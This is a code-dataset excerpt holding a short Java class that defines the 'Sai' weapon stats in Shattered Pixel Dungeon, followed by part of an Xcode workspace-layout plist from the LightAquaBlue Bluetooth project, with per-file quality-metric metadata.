| 11,885 | v0_2_X_Changes | java | en | java | code | {"qsc_code_num_words": 1614, "qsc_code_num_chars": 11885.0, "qsc_code_mean_word_length": 5.14002478, "qsc_code_frac_words_unique": 0.32094176, "qsc_code_frac_chars_top_2grams": 0.0084378, "qsc_code_frac_chars_top_3grams": 0.04580521, "qsc_code_frac_chars_top_4grams": 0.07473481, "qsc_code_frac_chars_dupe_5grams": 0.3623433, "qsc_code_frac_chars_dupe_6grams": 0.30231437, "qsc_code_frac_chars_dupe_7grams": 0.26832208, "qsc_code_frac_chars_dupe_8grams": 0.21311475, "qsc_code_frac_chars_dupe_9grams": 0.20672613, "qsc_code_frac_chars_dupe_10grams": 0.19214079, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01714461, "qsc_code_frac_chars_whitespace": 0.17551536, "qsc_code_size_file_byte": 11885.0, "qsc_code_num_lines": 239.0, "qsc_code_num_chars_line_max": 219.0, "qsc_code_num_chars_line_mean": 49.72803347, "qsc_code_frac_chars_alphabet": 0.8294724, "qsc_code_frac_chars_comments": 0.06562894, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.16129032, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.05913978, "qsc_code_frac_chars_string_length": 0.53714543, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.03225806, "qsc_codejava_score_lines_no_logic": 0.10215054, "qsc_codejava_frac_words_no_modifier": 0.85714286, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/weapon/melee/Sai.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
public class Sai extends MeleeWeapon {
{
image = ItemSpriteSheet.SAI;
tier = 3;
DLY = 0.5f; //2x speed
}
@Override
public int max(int lvl) {
return Math.round(2.5f*(tier+1)) + //10 base, down from 20
lvl*Math.round(0.5f*(tier+1)); //+2 per level, down from +4
}
@Override
public int defenseFactor( Char owner ) {
return 2; //2 extra defence
}
}
| 1,364 | Sai | java | en | java | code | {"qsc_code_num_words": 197, "qsc_code_num_chars": 1364.0, "qsc_code_mean_word_length": 5.03553299, "qsc_code_frac_words_unique": 0.61928934, "qsc_code_frac_chars_top_2grams": 0.03326613, "qsc_code_frac_chars_top_3grams": 0.03931452, "qsc_code_frac_chars_top_4grams": 0.05745968, "qsc_code_frac_chars_dupe_5grams": 0.08266129, "qsc_code_frac_chars_dupe_6grams": 0.05645161, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03147482, "qsc_code_frac_chars_whitespace": 0.18475073, "qsc_code_size_file_byte": 1364.0, "qsc_code_num_lines": 45.0, "qsc_code_num_chars_line_max": 73.0, "qsc_code_num_chars_line_mean": 30.31111111, "qsc_code_frac_chars_alphabet": 0.86061151, "qsc_code_frac_chars_comments": 0.6297654, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.10526316, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.10526316, "qsc_codejava_score_lines_no_logic": 0.31578947, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 1, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/LightAquaBlue.xcodeproj/blam.mode1v3 | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ActivePerspectiveName</key>
<string>Project</string>
<key>AllowedModules</key>
<array>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>PBXSmartGroupTreeModule</string>
<key>Name</key>
<string>Groups and Files Outline View</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>PBXNavigatorGroup</string>
<key>Name</key>
<string>Editor</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>XCTaskListModule</string>
<key>Name</key>
<string>Task List</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>XCDetailModule</string>
<key>Name</key>
<string>File and Smart Group Detail Viewer</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>1</string>
<key>Module</key>
<string>PBXBuildResultsModule</string>
<key>Name</key>
<string>Detailed Build Results Viewer</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>1</string>
<key>Module</key>
<string>PBXProjectFindModule</string>
<key>Name</key>
<string>Project Batch Find Tool</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>XCProjectFormatConflictsModule</string>
<key>Name</key>
<string>Project Format Conflicts List</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>PBXBookmarksModule</string>
<key>Name</key>
<string>Bookmarks Tool</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>PBXClassBrowserModule</string>
<key>Name</key>
<string>Class Browser</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>PBXCVSModule</string>
<key>Name</key>
<string>Source Code Control Tool</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>PBXDebugBreakpointsModule</string>
<key>Name</key>
<string>Debug Breakpoints Tool</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>XCDockableInspector</string>
<key>Name</key>
<string>Inspector</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>PBXOpenQuicklyModule</string>
<key>Name</key>
<string>Open Quickly Tool</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>1</string>
<key>Module</key>
<string>PBXDebugSessionModule</string>
<key>Name</key>
<string>Debugger</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>1</string>
<key>Module</key>
<string>PBXDebugCLIModule</string>
<key>Name</key>
<string>Debug Console</string>
</dict>
<dict>
<key>BundleLoadPath</key>
<string></string>
<key>MaxInstances</key>
<string>n</string>
<key>Module</key>
<string>XCSnapshotModule</string>
<key>Name</key>
<string>Snapshots Tool</string>
</dict>
</array>
<key>BundlePath</key>
<string>/Developer/Library/PrivateFrameworks/DevToolsInterface.framework/Resources</string>
<key>Description</key>
<string>DefaultDescriptionKey</string>
<key>DockingSystemVisible</key>
<false/>
<key>Extension</key>
<string>mode1v3</string>
<key>FavBarConfig</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>669281F20E296950008CB8B0</string>
<key>XCBarModuleItemNames</key>
<dict/>
<key>XCBarModuleItems</key>
<array/>
</dict>
<key>FirstTimeWindowDisplayed</key>
<false/>
<key>Identifier</key>
<string>com.apple.perspectives.project.mode1v3</string>
<key>MajorVersion</key>
<integer>33</integer>
<key>MinorVersion</key>
<integer>0</integer>
<key>Name</key>
<string>Default</string>
<key>Notifications</key>
<array/>
<key>OpenEditors</key>
<array/>
<key>PerspectiveWidths</key>
<array>
<integer>-1</integer>
<integer>-1</integer>
</array>
<key>Perspectives</key>
<array>
<dict>
<key>ChosenToolbarItems</key>
<array>
<string>active-target-popup</string>
<string>active-buildstyle-popup</string>
<string>action</string>
<string>NSToolbarFlexibleSpaceItem</string>
<string>buildOrClean</string>
<string>build-and-goOrGo</string>
<string>com.apple.ide.PBXToolbarStopButton</string>
<string>get-info</string>
<string>toggle-editor</string>
<string>NSToolbarFlexibleSpaceItem</string>
<string>com.apple.pbx.toolbar.searchfield</string>
</array>
<key>ControllerClassBaseName</key>
<string></string>
<key>IconName</key>
<string>WindowOfProjectWithEditor</string>
<key>Identifier</key>
<string>perspective.project</string>
<key>IsVertical</key>
<false/>
<key>Layout</key>
<array>
<dict>
<key>ContentConfiguration</key>
<dict>
<key>PBXBottomSmartGroupGIDs</key>
<array>
<string>1C37FBAC04509CD000000102</string>
<string>1C37FAAC04509CD000000102</string>
<string>1C08E77C0454961000C914BD</string>
<string>1C37FABC05509CD000000102</string>
<string>1C37FABC05539CD112110102</string>
<string>E2644B35053B69B200211256</string>
<string>1C37FABC04509CD000100104</string>
<string>1CC0EA4004350EF90044410B</string>
<string>1CC0EA4004350EF90041110B</string>
</array>
<key>PBXProjectModuleGUID</key>
<string>1CE0B1FE06471DED0097A5F4</string>
<key>PBXProjectModuleLabel</key>
<string>Files</string>
<key>PBXProjectStructureProvided</key>
<string>yes</string>
<key>PBXSmartGroupTreeModuleColumnData</key>
<dict>
<key>PBXSmartGroupTreeModuleColumnWidthsKey</key>
<array>
<real>186</real>
</array>
<key>PBXSmartGroupTreeModuleColumnsKey_v4</key>
<array>
<string>MainColumn</string>
</array>
</dict>
<key>PBXSmartGroupTreeModuleOutlineStateKey_v7</key>
<dict>
<key>PBXSmartGroupTreeModuleOutlineStateExpansionKey</key>
<array>
<string>0867D691FE84028FC02AAC07</string>
<string>089C1665FE841158C02AAC07</string>
<string>0867D69AFE84028FC02AAC07</string>
<string>1058C7B2FEA5585E11CA2CBB</string>
<string>034768DFFF38A50411DB9C8B</string>
<string>1C37FABC05509CD000000102</string>
</array>
<key>PBXSmartGroupTreeModuleOutlineStateSelectionKey</key>
<array>
<array>
<integer>5</integer>
<integer>4</integer>
<integer>0</integer>
</array>
</array>
<key>PBXSmartGroupTreeModuleOutlineStateVisibleRectKey</key>
<string>{{0, 0}, {186, 533}}</string>
</dict>
<key>PBXTopSmartGroupGIDs</key>
<array/>
<key>XCIncludePerspectivesSwitch</key>
<true/>
<key>XCSharingToken</key>
<string>com.apple.Xcode.GFSharingToken</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {203, 551}}</string>
<key>GroupTreeTableConfiguration</key>
<array>
<string>MainColumn</string>
<real>186</real>
</array>
<key>RubberWindowFrame</key>
<string>149 115 922 592 0 0 1280 778 </string>
</dict>
<key>Module</key>
<string>PBXSmartGroupTreeModule</string>
<key>Proportion</key>
<string>203pt</string>
</dict>
<dict>
<key>Dock</key>
<array>
<dict>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CE0B20306471E060097A5F4</string>
<key>PBXProjectModuleLabel</key>
<string>LightAquaBlue.bridgesupport</string>
<key>PBXSplitModuleInNavigatorKey</key>
<dict>
<key>Split0</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CE0B20406471E060097A5F4</string>
<key>PBXProjectModuleLabel</key>
<string>LightAquaBlue.bridgesupport</string>
<key>_historyCapacity</key>
<integer>0</integer>
<key>bookmark</key>
<string>6692821F0E468045008CB8B0</string>
<key>history</key>
<array>
<string>669282050E297147008CB8B0</string>
<string>669282060E297147008CB8B0</string>
<string>669282070E297147008CB8B0</string>
<string>669282080E297147008CB8B0</string>
<string>6692821B0E468045008CB8B0</string>
<string>6692821C0E468045008CB8B0</string>
</array>
<key>prevStack</key>
<array>
<string>6692820A0E297147008CB8B0</string>
<string>6692820B0E297147008CB8B0</string>
<string>6692820C0E297147008CB8B0</string>
<string>6692820D0E297147008CB8B0</string>
<string>6692820E0E297147008CB8B0</string>
<string>6692820F0E297147008CB8B0</string>
<string>669282100E297147008CB8B0</string>
<string>669282110E297147008CB8B0</string>
<string>669282120E297147008CB8B0</string>
<string>669282130E297147008CB8B0</string>
<string>669282140E297147008CB8B0</string>
<string>669282150E297147008CB8B0</string>
<string>6692821E0E468045008CB8B0</string>
</array>
</dict>
<key>SplitCount</key>
<string>1</string>
</dict>
<key>StatusBarVisibility</key>
<true/>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {714, 332}}</string>
<key>RubberWindowFrame</key>
<string>149 115 922 592 0 0 1280 778 </string>
</dict>
<key>Module</key>
<string>PBXNavigatorGroup</string>
<key>Proportion</key>
<string>332pt</string>
</dict>
<dict>
<key>BecomeActive</key>
<true/>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CE0B20506471E060097A5F4</string>
<key>PBXProjectModuleLabel</key>
<string>Detail</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 337}, {714, 214}}</string>
<key>RubberWindowFrame</key>
<string>149 115 922 592 0 0 1280 778 </string>
</dict>
<key>Module</key>
<string>XCDetailModule</string>
<key>Proportion</key>
<string>214pt</string>
</dict>
</array>
<key>Proportion</key>
<string>714pt</string>
</dict>
</array>
<key>Name</key>
<string>Project</string>
<key>ServiceClasses</key>
<array>
<string>XCModuleDock</string>
<string>PBXSmartGroupTreeModule</string>
<string>XCModuleDock</string>
<string>PBXNavigatorGroup</string>
<string>XCDetailModule</string>
</array>
<key>TableOfContents</key>
<array>
<string>669282020E296AB4008CB8B0</string>
<string>1CE0B1FE06471DED0097A5F4</string>
<string>669282030E296AB4008CB8B0</string>
<string>1CE0B20306471E060097A5F4</string>
<string>1CE0B20506471E060097A5F4</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.defaultV3</string>
</dict>
<dict>
<key>ControllerClassBaseName</key>
<string></string>
<key>IconName</key>
<string>WindowOfProject</string>
<key>Identifier</key>
<string>perspective.morph</string>
<key>IsVertical</key>
<integer>0</integer>
<key>Layout</key>
<array>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>ContentConfiguration</key>
<dict>
<key>PBXBottomSmartGroupGIDs</key>
<array>
<string>1C37FBAC04509CD000000102</string>
<string>1C37FAAC04509CD000000102</string>
<string>1C08E77C0454961000C914BD</string>
<string>1C37FABC05509CD000000102</string>
<string>1C37FABC05539CD112110102</string>
<string>E2644B35053B69B200211256</string>
<string>1C37FABC04509CD000100104</string>
<string>1CC0EA4004350EF90044410B</string>
<string>1CC0EA4004350EF90041110B</string>
</array>
<key>PBXProjectModuleGUID</key>
<string>11E0B1FE06471DED0097A5F4</string>
<key>PBXProjectModuleLabel</key>
<string>Files</string>
<key>PBXProjectStructureProvided</key>
<string>yes</string>
<key>PBXSmartGroupTreeModuleColumnData</key>
<dict>
<key>PBXSmartGroupTreeModuleColumnWidthsKey</key>
<array>
<real>186</real>
</array>
<key>PBXSmartGroupTreeModuleColumnsKey_v4</key>
<array>
<string>MainColumn</string>
</array>
</dict>
<key>PBXSmartGroupTreeModuleOutlineStateKey_v7</key>
<dict>
<key>PBXSmartGroupTreeModuleOutlineStateExpansionKey</key>
<array>
<string>29B97314FDCFA39411CA2CEA</string>
<string>1C37FABC05509CD000000102</string>
</array>
<key>PBXSmartGroupTreeModuleOutlineStateSelectionKey</key>
<array>
<array>
<integer>0</integer>
</array>
</array>
<key>PBXSmartGroupTreeModuleOutlineStateVisibleRectKey</key>
<string>{{0, 0}, {186, 337}}</string>
</dict>
<key>PBXTopSmartGroupGIDs</key>
<array/>
<key>XCIncludePerspectivesSwitch</key>
<integer>1</integer>
<key>XCSharingToken</key>
<string>com.apple.Xcode.GFSharingToken</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {203, 355}}</string>
<key>GroupTreeTableConfiguration</key>
<array>
<string>MainColumn</string>
<real>186</real>
</array>
<key>RubberWindowFrame</key>
<string>373 269 690 397 0 0 1440 878 </string>
</dict>
<key>Module</key>
<string>PBXSmartGroupTreeModule</string>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Name</key>
<string>Morph</string>
<key>PreferredWidth</key>
<integer>300</integer>
<key>ServiceClasses</key>
<array>
<string>XCModuleDock</string>
<string>PBXSmartGroupTreeModule</string>
</array>
<key>TableOfContents</key>
<array>
<string>11E0B1FE06471DED0097A5F4</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.default.shortV3</string>
</dict>
</array>
<key>PerspectivesBarVisible</key>
<false/>
<key>ShelfIsVisible</key>
<false/>
<key>SourceDescription</key>
<string>file at '/Developer/Library/PrivateFrameworks/DevToolsInterface.framework/Resources/XCPerspectivesSpecificationMode1.xcperspec'</string>
<key>StatusbarIsVisible</key>
<true/>
<key>TimeStamp</key>
<real>0.0</real>
<key>ToolbarDisplayMode</key>
<integer>1</integer>
<key>ToolbarIsVisible</key>
<true/>
<key>ToolbarSizeMode</key>
<integer>1</integer>
<key>Type</key>
<string>Perspectives</string>
<key>UpdateMessage</key>
<string>The Default Workspace in this version of Xcode now includes support to hide and show the detail view (what has been referred to as the "Metro-Morph" feature). You must discard your current Default Workspace settings and update to the latest Default Workspace in order to gain this feature. Do you wish to update to the latest Workspace defaults for project '%@'?</string>
<key>WindowJustification</key>
<integer>5</integer>
<key>WindowOrderList</key>
<array>
<string>/Users/blam/code/lightblue/trunk/src/mac/LightAquaBlue/LightAquaBlue.xcodeproj</string>
</array>
<key>WindowString</key>
<string>149 115 922 592 0 0 1280 778 </string>
<key>WindowToolsV3</key>
<array>
<dict>
<key>Identifier</key>
<string>windowTool.build</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CD0528F0623707200166675</string>
<key>PBXProjectModuleLabel</key>
<string><No Editor></string>
<key>PBXSplitModuleInNavigatorKey</key>
<dict>
<key>Split0</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CD052900623707200166675</string>
</dict>
<key>SplitCount</key>
<string>1</string>
</dict>
<key>StatusBarVisibility</key>
<integer>1</integer>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {500, 215}}</string>
<key>RubberWindowFrame</key>
<string>192 257 500 500 0 0 1280 1002 </string>
</dict>
<key>Module</key>
<string>PBXNavigatorGroup</string>
<key>Proportion</key>
<string>218pt</string>
</dict>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>XCMainBuildResultsModuleGUID</string>
<key>PBXProjectModuleLabel</key>
<string>Build</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 222}, {500, 236}}</string>
<key>RubberWindowFrame</key>
<string>192 257 500 500 0 0 1280 1002 </string>
</dict>
<key>Module</key>
<string>PBXBuildResultsModule</string>
<key>Proportion</key>
<string>236pt</string>
</dict>
</array>
<key>Proportion</key>
<string>458pt</string>
</dict>
</array>
<key>Name</key>
<string>Build Results</string>
<key>ServiceClasses</key>
<array>
<string>PBXBuildResultsModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>1</integer>
<key>TableOfContents</key>
<array>
<string>1C78EAA5065D492600B07095</string>
<string>1C78EAA6065D492600B07095</string>
<string>1CD0528F0623707200166675</string>
<string>XCMainBuildResultsModuleGUID</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.buildV3</string>
<key>WindowString</key>
<string>192 257 500 500 0 0 1280 1002 </string>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.debugger</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>ContentConfiguration</key>
<dict>
<key>Debugger</key>
<dict>
<key>HorizontalSplitView</key>
<dict>
<key>_collapsingFrameDimension</key>
<real>0.0</real>
<key>_indexOfCollapsedView</key>
<integer>0</integer>
<key>_percentageOfCollapsedView</key>
<real>0.0</real>
<key>isCollapsed</key>
<string>yes</string>
<key>sizes</key>
<array>
<string>{{0, 0}, {317, 164}}</string>
<string>{{317, 0}, {377, 164}}</string>
</array>
</dict>
<key>VerticalSplitView</key>
<dict>
<key>_collapsingFrameDimension</key>
<real>0.0</real>
<key>_indexOfCollapsedView</key>
<integer>0</integer>
<key>_percentageOfCollapsedView</key>
<real>0.0</real>
<key>isCollapsed</key>
<string>yes</string>
<key>sizes</key>
<array>
<string>{{0, 0}, {694, 164}}</string>
<string>{{0, 164}, {694, 216}}</string>
</array>
</dict>
</dict>
<key>LauncherConfigVersion</key>
<string>8</string>
<key>PBXProjectModuleGUID</key>
<string>1C162984064C10D400B95A72</string>
<key>PBXProjectModuleLabel</key>
<string>Debug - GLUTExamples (Underwater)</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>DebugConsoleDrawerSize</key>
<string>{100, 120}</string>
<key>DebugConsoleVisible</key>
<string>None</string>
<key>DebugConsoleWindowFrame</key>
<string>{{200, 200}, {500, 300}}</string>
<key>DebugSTDIOWindowFrame</key>
<string>{{200, 200}, {500, 300}}</string>
<key>Frame</key>
<string>{{0, 0}, {694, 380}}</string>
<key>RubberWindowFrame</key>
<string>321 238 694 422 0 0 1440 878 </string>
</dict>
<key>Module</key>
<string>PBXDebugSessionModule</string>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Proportion</key>
<string>100%</string>
</dict>
</array>
<key>Name</key>
<string>Debugger</string>
<key>ServiceClasses</key>
<array>
<string>PBXDebugSessionModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>1</integer>
<key>TableOfContents</key>
<array>
<string>1CD10A99069EF8BA00B06720</string>
<string>1C0AD2AB069F1E9B00FABCE6</string>
<string>1C162984064C10D400B95A72</string>
<string>1C0AD2AC069F1E9B00FABCE6</string>
</array>
<key>ToolbarConfiguration</key>
<string>xcode.toolbar.config.debugV3</string>
<key>WindowString</key>
<string>321 238 694 422 0 0 1440 878 </string>
<key>WindowToolGUID</key>
<string>1CD10A99069EF8BA00B06720</string>
<key>WindowToolIsVisible</key>
<integer>0</integer>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.find</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CDD528C0622207200134675</string>
<key>PBXProjectModuleLabel</key>
<string><No Editor></string>
<key>PBXSplitModuleInNavigatorKey</key>
<dict>
<key>Split0</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CD0528D0623707200166675</string>
</dict>
<key>SplitCount</key>
<string>1</string>
</dict>
<key>StatusBarVisibility</key>
<integer>1</integer>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{0, 0}, {781, 167}}</string>
<key>RubberWindowFrame</key>
<string>62 385 781 470 0 0 1440 878 </string>
</dict>
<key>Module</key>
<string>PBXNavigatorGroup</string>
<key>Proportion</key>
<string>781pt</string>
</dict>
</array>
<key>Proportion</key>
<string>50%</string>
</dict>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1CD0528E0623707200166675</string>
<key>PBXProjectModuleLabel</key>
<string>Project Find</string>
</dict>
<key>GeometryConfiguration</key>
<dict>
<key>Frame</key>
<string>{{8, 0}, {773, 254}}</string>
<key>RubberWindowFrame</key>
<string>62 385 781 470 0 0 1440 878 </string>
</dict>
<key>Module</key>
<string>PBXProjectFindModule</string>
<key>Proportion</key>
<string>50%</string>
</dict>
</array>
<key>Proportion</key>
<string>428pt</string>
</dict>
</array>
<key>Name</key>
<string>Project Find</string>
<key>ServiceClasses</key>
<array>
<string>PBXProjectFindModule</string>
</array>
<key>StatusbarIsVisible</key>
<integer>1</integer>
<key>TableOfContents</key>
<array>
<string>1C530D57069F1CE1000CFCEE</string>
<string>1C530D58069F1CE1000CFCEE</string>
<string>1C530D59069F1CE1000CFCEE</string>
<string>1CDD528C0622207200134675</string>
<string>1C530D5A069F1CE1000CFCEE</string>
<string>1CE0B1FE06471DED0097A5F4</string>
<string>1CD0528E0623707200166675</string>
</array>
<key>WindowString</key>
<string>62 385 781 470 0 0 1440 878 </string>
<key>WindowToolGUID</key>
<string>1C530D57069F1CE1000CFCEE</string>
<key>WindowToolIsVisible</key>
<integer>0</integer>
</dict>
<dict>
<key>Identifier</key>
<string>MENUSEPARATOR</string>
</dict>
<dict>
<key>Identifier</key>
<string>windowTool.debuggerConsole</string>
<key>Layout</key>
<array>
<dict>
<key>Dock</key>
<array>
<dict>
<key>BecomeActive</key>
<integer>1</integer>
<key>ContentConfiguration</key>
<dict>
<key>PBXProjectModuleGUID</key>
<string>1C78EAAC065D492600B07095</string>
<key>PBXProjectModuleLabel</key>
